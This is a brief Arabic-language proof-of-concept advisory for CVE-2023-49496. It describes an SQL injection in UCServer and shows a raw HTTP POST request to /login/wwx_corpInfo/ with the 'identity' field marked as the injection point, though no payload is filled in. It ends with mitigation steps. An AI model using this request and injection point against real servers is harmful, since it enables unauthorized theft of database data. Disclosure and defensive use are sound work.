
استغلال إثبات مفهوم لثغرة CVE-2023-49496، يوضح حقن SQL في UCServer عبر نقطة النهاية /login/wwx_corpInfo/ لاستخراج معلومات حساسة من قاعدة البيانات.
UCServer هو خادم اتصالات متكامل ومتقدم. يحتوي خادم UCServer من شركة Shanghai Shupin Information Technology Co., Ltd. على ثغرة حقن SQL، ويمكن للمهاجم استغلال هذه الثغرة للحصول على معلومات حساسة من قاعدة البيانات.
POST /login/wwx_corpInfo/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://example.com/
Content-Length: 132
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: example.com
Proxy-Connection: Keep-alive
&identity=
حقل "identity" في جسم طلب POST هو نقطة الحقن

قم بتفعيل جدار حماية الموقع؛ امنع أي عنوان IP من الوصول إلى المسار "/login/wwx_corpInfo/"؛ امنع قاعدة البيانات من قبول الاتصالات الخارجية عن بُعد؛ قم بترقية إصدار قاعدة البيانات.